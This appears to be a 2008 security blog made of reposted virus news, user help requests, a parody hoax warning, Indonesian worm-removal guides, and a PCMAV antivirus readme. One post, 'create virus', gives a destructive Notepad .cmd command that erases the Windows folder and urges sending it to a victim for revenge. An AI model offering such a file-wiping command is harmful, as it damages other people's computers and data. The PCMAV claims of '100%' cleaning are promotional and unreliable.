2008-07-06T20:53:00.000-07:00

The latest Sober virus (known as W32.Sober.X@mm, Sober.Y and W32/Sober@MM!M681) has passed its January deadline for updates without incident.

The Sober virus and its variants have been one of the most prolific of 2005 and has topped the charts again in recent months. In early December, anti-virus vendors cracked the algorithm the virus uses to search for updates, allowing the next set of Web sites to be blocked and Web hosting companies to be notified. The virus was set to search for updates from thirty unique websites, fifteen each on January 5th and January 6th.

This week Sober has plummeted in virus rankings and has effectively ceased to spread, thanks to the combined effort by anti-virus firms and security professionals worldwide. Existing infections will continue to search for updates; ISPs are advised to watch traffic patterns and notify customers they are still infected.

In an unusually positive twist, the Sober virus was responsible for catching a 20-year-old child-porn predator in Germany. However the virus was also responsible for Nazi-like hate spam earlier in the year.

Beware of the 'Kama Sutra' Virus:

2008-07-06T20:51:00.000-07:00

Microsoft in an e-mail Tuesday warned users to update their antivirus protections against the Kama Sutra worm, the mass-mailing virus slated to begin corrupting files later this week.
In its advisory for the Kama Sutra worm, otherwise known as win32/Mywife.E@mm and Nyxem.E, Microsoft warns users to be wary of opening unknown attachments.
The worm, which infects a user's computer once an attachment is opened, may also spread over writeable network shares if there are blank administrator passwords. Users hit with the worm may find a number of their files permanently corrupted on the third day of every month, beginning this Friday.
Like other worms, the Kama Sutra virus attempts to disable security software that is loaded on users systems, Microsoft warns.
Microsoft is advising users to update their antivirus software, as well as remain cautious when opening unknown attachments and use strong password protection.
Security experts estimate the worm has infected at least 500,000 PCs, often using pornography as its enticement.

Source: http://zdnet.com.au/news/security/soa/Micr...39236008,00.htm

Feb Virus Warning! - Feb Virus Warning!!!

2008-07-06T20:45:00.000-07:00

There were a couple of Virus warnings released by Major Anti Virus manufacturers regarding the outbreak of Two (or are they the same??) worms.
One is the Black Worm and other is the 'Kama Sutra' virus.......

It has been observed that the Black Worm also known as W32.Vb.i or W32.Nayem.E has been actively spreading in India since last two weeks now. It’s a mass-mailing worm that also spread using remote shares. After a long gap there has been an outbreak kind of situation as this worm was successful in spreading all over the globe within few hours when it first appeared over the Internet. The reason why the worm was so successful in spreading all over is just because it spreads by creating a mime encoded compressed executable with a different extension (.HQX, .BHX), which didn’t had any kind of header to classify the file. As a result the mail gateway scanners were not able to decode the attachment and scan the infected files. This is why the worm got skipped even though the mail severs have updated anti-virus scan engines. Many of the leading AntiVirus software’s had to do some changes to their scan engine to make the scanners decode the file and scan for the infected attachment

This worm has a dangerous payload, it will delete all the documents, worksheets, presentations, database files and compressed backup files from the system on every 3rd day of the month. This is very serious payload considering that the worm has spread all over India and the first payload day of 3rd February is arriving very soon. We recommend all our users to have their AntiVirus updated, up and running

Source: http://www.efytimes.com/fullnews.asp?edid=9930&magid=14

Update! Anti Virus For Flashdrive Only (v1.7.0)1315 - (v1.7.0)1315

2008-07-06T20:37:00.001-07:00

Update!! Anti Virus For Flashdrive only No Setup

http://www.skupload.com/cpe17anti.html

Virus For Mac Arrives!

2008-07-06T20:33:00.001-07:00

The first virus for Macs has appeared on the scene. Known as Leap - A, it is a low level threat, but almost certainly the harbinger of future threats.

For years, Mac users have claimed the o/s to be safe and secure, with no virus problems, even 'tho the reason for that was simply because of the small amount of users, not the difficulty of creating a virus for the o/s.

Now, as with Firefox, as the number of users grows, so the creators of virus , malware etc will begin to target the Mac.

Quick Virus Question

2008-07-06T20:32:00.000-07:00

I've always have run a tight ship so I very rarely get a virus, but I've got a client who has somehow managed to get some sort of mailer Trojan horse on their computer HOWEVER, Norton Antivirus has the virus isolated and ready for removal.

From the instruction sheet (I'm assuming they got it from Symantec), they updated Norton and did a full system scan.

The virus shouldn't do anything since Norton has it quaritined, correct?

Now, it may have injected values into the Registry (which is why they want me to do it as they don't know what the registry is, let alone know how to access it and delete values from it). I don't think this will be a problem since I can read the Symantec technical data sheets so the registry is not a problem.

Working on Linux a lot makes me glad I don't have to deal with viruses... man, Windows sucks...

Lol MS Excel Is/Was A Virus

2008-07-06T20:31:00.001-07:00

Thanks to a McAfee update the users was warned by them that Microsoft Excel is a Virus.
Last Mars, 10 2006 Microsoft Excel was pointed as W95/CTX Virus. This mistake happened because an error accoured with the new definitions sent to users.

McAfee solved the problem a few hours later, thanks to the complains sent by a large group of McAfee Clients.

LOL, I thinks is Funny , LOL

MSN "Thank You For Using" And Sharing - AN MSN virus ?

2008-07-06T20:28:00.002-07:00

MSN now opens a window where wee see things happening :
It starts a frame with with the words Virus - (1513 kB)
Then it says "scanning C disk"
Then "installing"
Then "propagating"
Then it ends with "Thank you for usin' and sharin'"
What is that thing ?
Is it a fake ?
Or is it a ral virus ? I must confess I'm a little bit afraid.

A goggling made me find a german site saying roughly "probably a fake". However, even if it's a fake, it behaves like a trojan because it's a program residing on your computer and activated evrytime you open a new window.

If somebody has info, I would appreciate.
Regards
Yordan

New Virus? Uglyhuman Msn Virus - A worm that isn't in the virus definitions yet?

2008-07-06T20:28:00.001-07:00

Have you ever gotten a message from your friends that say something like this:

its you on this photo http://uglyhuman.net/photo***.php

I have received that from at least 3 people. Without knowing what it was (and the surprise from the domain name with the message ), I clicked on the link and Firefox prompted me to download a file. It was a COM file so I thought that was strange. I rechecked the URL it was a PHP web page, so I assumed it was telling me to download the photo, so I opened it in Firefox.

Windows Live OneCare prompted me that Windows Live Messenger was about to run (with something that said updated program or something similar). I found that strange so therefore I clicked on Block this Program.

So after my next reboot, Windows Live OneCare said that it still blocked Windows Live Messenger. I assumed it was now safe to run Windows Live Messenger now, so I clicked the option to allow, closed Windows Live OneCare and opened Windows Live Messenger. Boy was I wrong! The virus started opening up windows of both online and offline people and started sending that message to them. It opened and closed windows so much that it was impossible to use ALT+TAB, ALT+F4 or even bring up Task Manager.

I unplugged the cable from my Internet modem and Windows Live Messenger disconnected. I quit the program then looked on Firefox to see if there was any instructions to remove this. The only results that come up were;

Yahoo! Answers - Weird Virus (no one got the answer there)
TechGuy Forums - Security (it was suggested to use HijackThis, but it didn't help)

So the virus isn't even in the definitions yet but it is spreading among buddies quite quickly. For the domain name, uglyhuman.net, McAfee SiteAdvisor has no rating for it. It would definitely be red for sure.

The virus isn't a running process, I couldn't find it in Task Manager or Process Log. However (not sure if the virus caused this), my explorer.exe process ended abruptly and had to restart a few times. Now I am stuck in Ubuntu (Linux) on a Live CD and OpenOffice.org really slowly (I need Microsoft Word). Anyone have suggestions to get rid of the virus? It isn't a running/startup process, it operates within Windows Live Messenger. Do I need to reinstall Windows XP?

Some Weird Virus

2008-07-06T20:24:00.000-07:00

A couple of weeks ago I was sent a file over AIM (Instant Messaging Service). Stupidly enough, though I didn't know the person I accepted and opened the file. I didn't think there was anything malicious about it since my Virus Program scanned it and nothing was found. So I opened it and a message soon appeared saying "Your trial of Obsidium is over." I have no idea what Obsidium is and I never installed it, so I simply closed the warning box and forgot about it. However, the next time I booted up the machine I tried to login and the computer hesitated, the same Obsidium message came up and another message appeared in the top right corner appeared which said Systeminfo32 (I think that was the name of it) was trying to update itself. I pressed CTRL ALT Delete since my system was now at a halt, with only the two boxes appearing to make progress. Under Processes in Windows Task Manager I saw a program I could not recognized called "system32:systeminfo2.exe". I closed it immediately and I was able to proceed and everything was fine. However, now this occurrence happens every time I start up my computer. I searched for "system32:systeminfo2.exe" on Google and I was unable to find any good information. Can some one help me out. I have even tried using MSCONFIG to disable the EXE on the startup, but it just comes back every start up. I even tried using Hijack this, which is like MSCONFIG, but has more you can disable such as Browser Add-ons and such, but I had no luck. This is a pesky little virus, and though I have no information whether it is eating away at my System's internals, it could be. I tried to find "system32:systeminfo2.exe" so I could delete it, but even running a search left me unable to trace it. Any advice or help on this subject, so I can successfully remove this problem. Also, what kind of virus scanner would you guys recommend.

create virus :: Very Easy But Very Dangerous Virus

2008-07-06T20:22:00.000-07:00

The only thing you need is Notepad .
Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.

New Virus - Very Dangerous Virus

2008-07-06T20:20:00.000-07:00

If you received an e-mail with a subject line of "Badtime," delete it immediately without reading it. It is the most dangerous e-mail virus yet.

It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer.

It will recalibrate your refrigerator's settings so all your ice cream melts and your milk curdles. It will demagnitize the strips on all your credit cards, reprogram your ATM access codes, screw up the tracking on your VCR and use subspace field harmonics to scratch any CD's you try to play.

It will give your ex-boy/girlfriend your new phone number. It will mix antifreeze into your fish tank. It will drink all your beer and leave your dirty socks on the coffee table when there's company coming over.

It will hide your car keys when you are late for work and interfere with your car radio so that you hear only static while stuck in traffic.

Badtimes will make you fall in love with a hardened pedophile. It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card.

Badtimes will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub.

It willl not only remove the forbidden tags from your mattress and pillows, it will refill your skim milk with whole milk.

It is insidious and subtle. It is dangerous and terrifying to behold.

It is also a rather interesting shade of mauve. These are just a few of the signs.

Dangerous virus attacks

2008-07-06T20:19:00.001-07:00

A dangerous Trojan spying on your computer while connecting to a remote attacker is a threat big enough, in itself. What if the same malice has peer-to-peer creeping ability too?!

Security experts at MicroWorld Technologies inform that ‘Trojan.Win32.Inject.t’ or ‘W32/Inject-H’ is a new peer-to peer worm with IRC backdoor Trojan capacities. ‘Inject.t’ can run in the background of a computer by working as a Server that allows a hacker to control the system via IRC channels.

Exploiting Windows vulnerabilities, this worm will proliferate in networks. First it copies itself into a shared folder on the local machine. From there, the P2P network takes over to contact other computers in the network and helps them download and execute the infected file.

MicroWorld experts observe that it even mimics network protocol of specific file-sharing networks by responding to file requests and distributes the infected component across the network.

“This one can get quiet nasty if an attacker is eying the business critical information of an enterprise. Through a single point, this Trojan spreads wide and fast to other computers to expose the total network to a hacker. Sitting in remote place, the hacker has your enterprise at his finger tips,” explains Govind Rammurthy, CEO, MicroWorld Technologies.
Original article

Trojan horse

2008-07-06T20:11:00.000-07:00

n the context of computing and software, a Trojan horse, also known as a trojan, is a piece of malware which appears to perform a certain action but in fact performs another such as transmitting a computer virus. Contrary to popular belief, this action, usually encoded in a hidden payload, may or may not be actually malicious, but Trojan horses are notorious today for their use in the installation of backdoor programs. Simply put, a Trojan horse is not a computer virus. Unlike such malware, it does not propagate by self-replication but relies heavily on the exploitation of an end-user (see Social engineering). It is instead a categorical attribute which can encompass many different forms of codes. Therefore, a computer worm or virus may be a Trojan horse. The term is derived from the classical story of the Trojan Horse.

In the field of computer architecture, 'Trojan Horse' can also refer to security loopholes that allow kernel code to access anything for which it is not authorized.^{[citation needed]}

Computer worm

2008-07-06T20:03:00.000-07:00

A computer worm is a self-replicating computer program. It uses a network to send copies of itself to other nodes (computer terminals on the network) and it may do so without any user intervention. Unlike a virus, it does not need to attach itself to an existing program. Worms almost always cause harm to the network, if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. (wikipedia.com)

Basmi Brontox dengan Mudah

2008-07-05T02:57:00.000-07:00

Gejala komputer anda terinfeksi virus Varian Brontok atau Pendekar Blank :
Windows ter’close
Komputer tiba-tiba restart
Keluar pesan berupa file text(notepad) atau html(iexplorer)
File yang di create virus pendekar blank :
AUT0EXEC.BAT (harusnya autoexec), di c:\
M5VBVM60.EXE (harusnya msvbvm) di c:\windows\system32
Regedit32.com (harusnya regedit32.exe), di c:\windows\system32
Shell32.com. (harusnya ini memang gak ada) di c:\windows\system32
dllchache.exe (harusnya gak ada) di c:\windows\system32
Selain menutup windows-windows yang sedang kita pakai, menyembunyikan folder, virus pendekar blank juga mengirim pesan di
file
c:\(Read Me)Pendekar Blank.txt
Salam Kenal Buat User yang sedang Aktif di Komputer ini
Saya adalah Pendekar Blank 1, Program yang dibuat oleh seseorang yang ingin
memberantas kejahatan di muka bumi ini dan saya dikirim ke sini untuk:
1. Mencoba memberantas virus-virus lokal yang sudah menyebar di Indonesia
2. Mencoba mengamankan komputer ini dari infeksi virus lokal, dan
3. Mencoba menghalangi anda untuk berbuat sesuatu yang tidak perlu dilakukan di komputer ini
Itulah 3 Misi saya setelah dikirim ke komputer ini
Mohon maaf apabila nantinya terdapat kesalahan-kesalahan selama melakukan 3 misi diatas
Mudah-mudahan anda adalah orang baik yang mempergunakan komputer pada jalan yang benar
Untuk menampilkan folder yang disembunyikan ketik di command prompt:
Misal di drive E :
attrib -R -H -S E:\*.* /S /D
(-) melepas atribut
(+) terapkan atribut
R : read only
H : hidden
S : file sistem
/S /D : folder dan seluruh sub folder
Untuk mengalahkan pendekar blank kita gunakan antivirus lokal seperti PCMAV (dari Majalah PC) atau ansav (http://www.ansav.com ), keduanya cukup ampuh untuk membasmi virus-virus lokal terbaru.

Virus Lokal basmi Virus Import?

2008-07-05T02:55:00.000-07:00

Jakarta - Untuk memperbaiki versi sebelumnya, VBWorm.NA (yang juga dinamai virus Dago) menelurkan varian teranyarnya dengan spesifikasi yang hampir sama. Dengan antivirus Norman Virus Control, varian terbaru Dago terdeteksi dengan nama W32/KillAV.

"Sesuai dengan namanya, KillAV akan mencoba membasmi program antivirus dengan cara menghapus file yang berada pada instalasi antivirus itu sendiri, sehingga antivirus tersebut tidak dapat berfungsi dengan baik," kata Alfons Tanujaya, spesialis antivirus dari PT Vaksincom, seperti dikutip detikINET dari keterangan tertulisnya, Selasa (26/09/2006).

Alfons mengingatkan, hal ini sangat berbahaya karena tanpa perlindungan program antivirus yang memadai, komputer yang terhubung ke jaringan atau Internet sangat rentan terhadap serangan.

VBWorm.NA muncul pada pertengahan Juli 2006, dan disinyalir berasal dari kawasan terkenal di Bandung, Jawa Barat yaitu Dago. Dinamakan demikian, karena virus ini memunculkan string "dago dago dago dago" pada header browser.

Meski penyebarannya tidak seluas Rontokbro atau Moonlight, perusahaan antivirus PT Vaksincom mengatakan virus Dago telah menginfeksi ratusan komputer di Indonesia.

Dalam versi barunya, Dago yang kemudian dikenal sebagai KillAV, menandai aksi infeksinya dengan munculnya string "Kata Mutiara" setiap kali komputer booting. Virus ini juga menandai aksinya dengan menampilkan gambar bunga mawar ketika membuka browser Internet Explorer.

Aksi KillAV juga ditandai dengan menyisipkan setangkai bunga mawar pada tabulasi "General" pada System Properties komputer yang terinfeksi. Dan yang menjadi ciri pamungkasnya adalah melumpuhkan fungsi program antivirus yang terinstal.

Untuk mengelabui pengguna komputer, KillAV juga akan memanipulasi setiap file yang sudah terinfeksi dengan menggunakan ikon "Folder" berukuran 57 KB, memakai ekstensi .EXE dengan tipe file "Application".

Dijelaskan Alfons, seperti pendahulunya KillAV dibuat dengan menggunakan Bahasa VB (Visual Basic). Jika biasanya virus yang dibuat dengan VB relatif lebih mudah dihentikan aksinya -- yaitu dengan cara merubah nama file MSVBVM60.dll yang terletak pada direktori [C:\Windows\System32] -- maka tidak demikian dengan KillAV ini.

Untuk berjaga-jaga agar KillAV dapat tetap aktif walaupun file MSVBVM60.dll tersebut diubah atau dihapus, ia akan membuat file yang sama [msvbvm60.dll] pada direktori C:\WINDOWS\system32\5810, demikian penjelasan Alfons.

Basmi Antivirus

"Jika sebelumnya virus lokal hanya menghentikan proses antivirus, kini VBWorm.NA benar-benar akan menghancurkan program antivirus tersebut sampai ke akar-akarnya, dengan cara menghapus file pendukung antivirus tersebut (khususnya file eksekusi)," papar Alfons.

Virus ini membasmi program antivirus tertentu diantaranya: Norman Virus Control, McAffe, Symantec, ESET, Antivir, Norton, AVG, Kaspersky, Panda Antivirus, PCCilin.

Selain dengan update terbaru antivirus, upaya pembersihan KillAV dapat dilakukan dengan cara manual, yaitu dengan mematikan proses virus yang sedang aktif di memori; lalu menghapus string yang dibuat oleh virus; menghapus file induk dan file duplikat yang dibuat oleh KillAV; dan menginstal kembali program antivirus yang terinstal sebelumnya, karena bisa jadi KillAV berhasil membasmi program antivirus tersebut. ( nks / nks )

Virus Lokal? g masalah!!!

2008-07-05T02:54:00.000-07:00

Dewasa ini perkembangan virus lokal telah menjadi masalah tersendiri bagi pelaku TI didalam negeri, dan telah banyak memakan korban. Biasanya program virus lokal memiliki ciri-ciri umum yang hampir sama yaitu menyamarkan dirinya dengan icon folder, menduplikasi diri secara massal ke flashdisk, dan mengaktifkan dirinya lebih dari satu process pada komputer yang menjadi korban, serta melakukan blokir terhadap beberapa fungsi system yang memiliki potensi untuk menghapus virus seperti task manager, cmd, registry editor dan beberapa antivirus.

Jika dilihat dari ciri-ciri tersebut, maka dengan mudah kita dapat mengetahui apakah system kita telah terinfeksi atau belum, misalnya tiba-tiba pada flashdisk bermunculan berbagai file exe dengan icon folder.

Berbagai teknik penanganan virus lokal telah direlease oleh situs ataupun majalah komputer (menggunakan tools seperti hijackthis, pexplorer, dll), dan tetap saja sulit diikuti (bahkan oleh pelaku IT yang sudah berpengalaman), karena virus lokal secara aktif akan mematikan fungsi system sebagaimana yang dijelaskan sebelumnya (pada beberapa virus secara otomatis akan mengenali process program-program utility tersebut dan mematikan process program begitu tools tersebut diaktifkan).

Bagaimana solusi dengan Antivirus komersil ? Rasanya cukup membantu, tetapi untuk virus-virus yang sudah tersedia patternnya, bagaimana dengan virus baru ? Begitu system anda terinfeksi, dan program antivirus yang ada pasti tidak berkutik, karena virus secara aktif akan mematikan process antivirus, sehingga tidak memungkinkan kita untuk mengupdate program antivirus dengan definisi yang terbaru.

Apa yang harus saya lakukan jika system saya telah terinfeksi

Jika anda mengetahui system anda terinfeksi, merupakan awal dari solusi yang akan saya tawarkan, ikuti saja langkah berikut ini :

Masukkan flashdisk anda
Catat file-file yang bertambah, ataupun amati file-file apa saja yang memiliki icon folder tetapi memiliki extension exe (ada beberapa virus menggunakan icon MSWord dan ACDSee).
Download file IndoprogMagicAv dari forum diskusi indoprog, dan unzip ke folder c:\indoprog
Jalankan a.bat dari folder c:\indoprog
Klik pada load pattern virus, dan buka file virus yang telah anda dapatkan pada langkah 2
Klik pada scan.

Basmi Virus tanpa Antivirus

2008-07-05T02:52:00.000-07:00

pengen aman dari virus lokal tanpa antivirus mudah aja kok ikuti aja tips berikut ini:

Caranya gampang siapin aja :
1. Virusnya (kalo gak punya, bisa minta ama warnet2 terdekat hohoho)
2. Hijack Tools yang bs di download di
http://www.spywareinfo.com/~merijn/downloads.html
3. Tidak diperlukan keahlian yang amat sangat.

Ternyata virus-virus local emang memiliki ciri yang sangat khas diantaranya mendisablekan run, regedit, task manager, sama search. Untuk brontok penduplikatan diri hanya berbatas penduplikatan file .EXE tapi kalo Romantic Devils lebih canggih, virus ini selain menduplikatkan diri juga mengirimkan string ke registry seiring penduplikatannya itu, tapi cuman butuh 10 menit buatlinnya hohoho.

Oke langsung saja :

1. Aktifin HijackThis

2. Trus cari :

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies,DisableRegedit=1, langsung klik [Fix checked], ini buat balikin fungsi regedit.

Trus Cari yang sekiranya mencurigakan, contoh bron-spizaetus, empty.pif, bronstab.exe. kalo kangen ccapps, kalo romantic devil sysria dll.

3. Sekarang masuk ke regedit (kita belum ngaktifin run, jadi lewat manual ke windows\regedit), trus cari yang aneh-aneh misal kalo brontok cari
values : bron-spizaetus, tok-cirrhatus, dll. Trus langsung hapus bleh

4. Nah buat balikin fungsi yang di matiin (Run, Search, Folder Options) cari di
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, trus langsung delete aja, atau ubah stringnya jadi (0). Misalnya
NoRun Reg_dword 0×00000000 (1) di ubah jadi NoRun Reg_dword 0×00000000 (0). Arti dari 1 adalah true dan 0 adalah false itu kata dosen COA gw.

5. Kemudian search *.exe, cari yang ukuran filenya sama dan ikon berbentuk folder tanpa dosa (20 kb, 40 kb, 80kb tergantung variantnya). Trus hapus.

6. Sekarang tinggal nunggu virus baru dan siap basmi.

kutipan jasakom.com

PC Media Antivirus Update Bulanan

2008-07-05T02:46:00.000-07:00

PC Media Antivirus merupakan antivirus lokal buatan majalah PC Media yang cukup eksis dengan keunggulan :
1. Mampu melakukan clean/recovery pada file document yang berubah menjadi ekstensi .scr
2. Kecepatan searching yang semakin meningkat
3. Mampu mendeteksi virus-virus lokal seperti brontok dan variannya

Official Site PC Media Antivirus : www.virusindonesia.com
MENGAPA PCMAV?
--------------
Saat ini PCMAV merupakan satu-satunya antivirus di dunia yang
mengandung formula dan teknologi khusus yang unik dan tangguh untuk
mengatasi virus komputer yang menyebar luas di Indonesia, baik
jenis lokal maupun mancanegara (asing), secara akurat dan tuntas
100% tanpa merusak sistem Windows, dokumen dan file penting.

PCMAV diciptakan dan dikembangkan sebagai bentuk rasa cinta dan
terimakasih kami kepada para pembaca setia PC Media. Namun
demikian, kami juga merasa senang jika masyarakat umum dapat
merasakan manfaatnya.

Dikembangkan secara intensif oleh PC Media, majalah komputer
terbesar dan terlaris di Indonesia, serta didukung luasnya jaringan
distribusi Pinpoint Publications, PCMAV telah dipercaya oleh lebih
dari 300.000 komputer pembaca setia dan pecinta Majalah PC Media di
nusantara dan angka ini akan terus bertambah.

Perlu teknik dan pengalaman tersendiri untuk menciptakan sebuah
antivirus yang ampuh dan terpercaya. Dengan pengalaman sejak tahun
1992, peneliti antivirus di PC Media merupakan pakar antivirus
komputer yang paling berpengalaman dan termasuk langka di
Indonesia.

Teknisi PCMAV yang sangat ahli, terlatih dan berpengalaman secara
meyakinkan berhasil menemukan dan mengembangkan sendiri berbagai
teknologi baru nan handal untuk mengatasi virus dan menjaga sistem
Anda tetap berjalan normal. Selain menggunakan engine antivirus-nya
sendiri, PCMAV juga dapat mengkombinasikan engine dari ClamAV
sebagai plugin untuk memperkuat hasil pendeteksian hingga 91.000
virus lebih (lihat keterangan di bawah).

Kami pun percaya bahwa PC Media merupakan satu-satunya majalah komputer
di dunia (termasuk di Indonesia) yang memiliki tim dengan talenta tinggi
yang didedikasikan secara penuh dan profesional untuk meneliti dan
mengembangkan antivirus-nya sendiri. Ini membuktikan komitmen PC Media
untuk selalu memberikan nilai tambah kepada pembaca setianya.

Jadi, mulai sekarang, percayakan selalu penanganan virus, worm
maupun trojan yang menyerang komputer Anda hanya kepada PCMAV.
Dapatkan versi terbarunya hanya dari majalah PC Media edisi
terbaru, terbit tiap bulan.

KETENTUAN PENGGUNAAN (END-USER LICENSE)
---------------------------------------
PC Media Antivirus (PCMAV) merupakan karya dan hak cipta serta
bagian yang tak terpisahkan dari PC Media, majalah komputer bulanan
yang diterbitkan oleh PT Dian Digital Media yang merupakan bagian
dari kelompok penerbitan terkemuka di Indonesia: Pinpoint
Publications.

PCMAV tidak dinyatakan sebagai program yang bersifat public-domain
(milik publik) maupun freeware (tanpa biaya), tetapi Anda bebas
menggunakan dan menyebarluaskan program ini secara UTUH dan LENGKAP
(termasuk file README.TXT ini) tanpa dikenakan biaya apapun
sepanjang PCMAV tidak disertakan bersama dengan materi yang
melanggar hukum dan ketentuan program seperti yang akan dijelaskan
pada bagian ini ditaati.

PCMAV dan seluruh program antivirus buatan Majalah PC Media
diizinkan untuk pemakaian tunggal oleh pemilik Majalah PC Media
pada edisi yang menyertakannya, baik itu pemilik perorangan maupun
badan hukum. Selain itu, program ini juga diizinkan untuk pemakaian
di komputer pribadi/rumah, lembaga nirlaba atau lembaga pendidikan
yang dibiayai oleh negara/lembaga nirlaba.

Dilarang keras menggunakan dan atau memanfaatkan program ini di
lingkungan bisnis atau lembaga yang berorientasi profit tanpa
memiliki secara sah Majalah PC Media yang menyertakannya.

Penggunaan dan atau pemanfaatan program ini tanpa izin untuk
tujuan/kepentingan komersial sama sekali tidak diperkenankan.

Anda juga tidak diperkenankan melakukan segala tindakan, baik
secara langsung maupun tidak langsung, yang dapat melanggar hak
atas kekayaan intelektual, termasuk tapi tak terbatas pada apa
yang dimaksud sebagai reverse engineer, decompile, disassemble,
atau memodifikasi PCMAV.

Pihak Majalah PC Media telah mengeluarkan segala upaya dan daya
serta menguji cobanya secara sungguh-sungguh agar PCMAV dapat
memberikan hasil terbaik. Namun demikian, seperti lazimnya program
komputer yang lain, Anda sangat menyadari dan memahami bahwa pihak
PC Media memberikan PCMAV dan segala file yang terkait dengan apa
adanya, tanpa memberikan jaminan apapun bahwa program ini terbebas
dari segala macam risiko teknis, dan kami tidak berkewajiban
mengganti segala biaya yang mungkin dapat ditimbulkan oleh segala
macam fungsi dari penggunaan program ini. Untuk itu, sangat
disarankan mem-backup data penting Anda sebelum menggunakan program
ini.

Dengan memanfaatkan/menggunakan PCMAV berarti Anda mengerti dan
setuju dengan seluruh ketentuan ini.

BUG? VIRUS TIDAK DIKENAL? TERKENA VIRUS BARU? PCMAV ERROR?
----------------------------------------------------------
Jika Anda mendapatkan PCMAV ini tidak berjalan sebagaimanamestinya,
silahkan melaporkannya ke redaksi PC Media melalui e-mail. Segera
setelah kami mampu menanganinya, Anda akan kami kirimkan PCMAV
terbaru yang telah diperbaiki.

Agar pembasmian virus dapat dilakukan secara tuntas, maka PCMAV
dirancang secara akurat dan pasti hanya untuk mengenali virus
komputer yang telah ada dalam koleksi virus komputer di Lab
Antivirus PC Media. Hasil modifikasi dari sebuah varian virus akan
menyebabkan PCMAV tidak mengenal virus tersebut. Begitu pun dengan
virus-virus baru yang selalu bermunculan. Untuk itu, silahkan kirim
dalam format ZIP yang ter-password melalui e-mail ke redaksi
PC Media beberapa contoh file yang Anda curigai bervirus. Setelah
kami berhasil menganalisanya (dan ini dibutuhkan waktu yang tidak
sebentar), kami akan kirimkan antivirus-nya berupa PCMAV SE (Single
Edition) kepada Anda.

PENYEMPURNAAN TANPA HENTI
-------------------------
Di setiap edisi Majalah PC Media terbaru yang terbit tiap bulannya,
kami senantiasa menyempurnakan PCMAV ini dengan kemampuan dan fitur
baru demi menjadikan PCMAV sebagai antivirus kebanggaan bagi Anda,
pembaca setia Majalah PC Media.

Terimakasih atas dukungan dan kepercayaan Anda kepada PCMAV!

FITUR & FAKTA UNGGULAN PCMAV
----------------------------
- ANTIVIRUS TERBAIK: Mengenali sekaligus mengatasi gangguan virus
komputer yang banyak menyebar di Indonesia (lokal & asing), lebih
banyak dari antivirus lainnya di dunia. Bukan hanya akurat, tapi
juga tuntas 100% tanpa merusak dokumen dan sistem Windows.
Keselamatan dokumen dan sistem Windows adalah prioritas utama di
PCMAV. Teknisi PCMAV yang sangat ahli, terlatih dan berpengalaman
selalu bekerja keras dan berdedikasi tinggi demi terciptanya
sebuah antivirus yang handal dan terpercaya. Tidak ada antivirus
lain yang sepeduli dan setuntas PCMAV dalam mengatasi virus
komputer.

- PENELITI YANG BERPENGALAMAN: Dengan pengalaman sejak tahun 1992,
pengembang antivirus di PC Media merupakan peneliti virus
komputer dan pembuat antivirus yang sangat berpengalaman dan
termasuk langka di Indonesia. Oleh karenanya, kami tahu benar
bagaimana menghasilkan antivirus terbaik. Selain itu, PCMAV juga
didukung penuh oleh PC Media, majalah komputer terbesar di
Indonesia.

- DENGAN DOBEL ENGINE ANTIVIRUS: PCMAV dapat dikombinasikan
dengan engine ClamAV yang telah disempurnakan oleh tim PCMAV
untuk mendapatkan hasil pendeteksian dan perlindungan virus yang
lebih banyak, bahkan hingga 91.000 virus lebih. Kombinasi dua
engine antivirus terbaik di kelasnya ini (PCMAV & ClamAV) sungguh
dahsyat dalam melindungi komputer Anda!

- PEMERIKSAAN MENYELURUH: PCMAV melakukan pemeriksaan secara
menyeluruh terhadap sistem sebelum melakukan pemeriksaan terhadap
folder/file. Dengan teknologi khusus, PCMAV bahkan mampu
mendeteksi dan mengatasi secara sempurna beberapa virus kompleks
yang aktif di memory maupun di registry, seperti PendekarBlank
atau Brontok, walau virus-virus tersebut berusaha melindungi
dirinya sendiri di memory atau tampil acak di registry. Hal ini
penting untuk mendapatkan hasil yang akurat dan sempurna.

- AKTIF MELINDUNGI: Teknologi "ActiveCheck" terbaru, yang terdapat
di PCMAV RealTime Protector, dirancang untuk secara pro-aktif
memastikan sebuah file yang dijalankan telah bebas virus dan akan
menghadang virus sebelum menyebar, bahkan untuk virus baru yang
belum dikenal. Jadi Anda pun bisa tenang, karena saat komputer
Anda bekerja, PCMAV RealTime Protector tak berhenti melindungi.

- TUNTAS 100%: Teknologi "DeepClean" terbaru dapat diandalkan untuk
memperbaiki (repair) secara menyeluruh hingga 100% settingan
registry dan file sistem penting Windows yang "dirusak" oleh
virus/trojan/worm maupun akibat penggunaan antivirus lain yang
kurang handal. Virus pun dapat dibasmi sampai ke "akar-akarnya"
tanpa merusak file maupun dokumen penting lainnya.

- MENYELAMATKAN DOKUMEN: Teknologi pintar "SmartUnhide" mampu
secara otomatis mengembalikan file,folder dan dokumen penting
yang disembunyikan oleh beberapa virus yang kompleks, seperti
Moonlight, FluBurung atau PendekarBlank, tanpa
merusak/menghapusnya.

- MENGENAL VIRUS BARU: Teknologi "GeneticHeuristic" yang unik
secara efektif mampu mendeteksi virus baru yang belum dikenal.

- MUDAH DIOPERASIKAN: Dengan PCMAV, menu dan tampilan dari sebuah
program antivirus kini begitu menyenangkan, mudah dioperasikan
dan tidak ribet.

- ENTENG: PCMAV cukup ringan dalam penggunaan memori dan resource
komputer.

- TANPA INSTALL: PCMAV berukuran cukup kecil dan bersifat portable,
sehingga dapat dioperasikan secara langsung tanpa perlu
meng-install-nya. Sangat cocok untuk penggunaan instan yang
bersifat darurat, seperti pada USB flash disk. Tinggal "copy" &
"paste"!

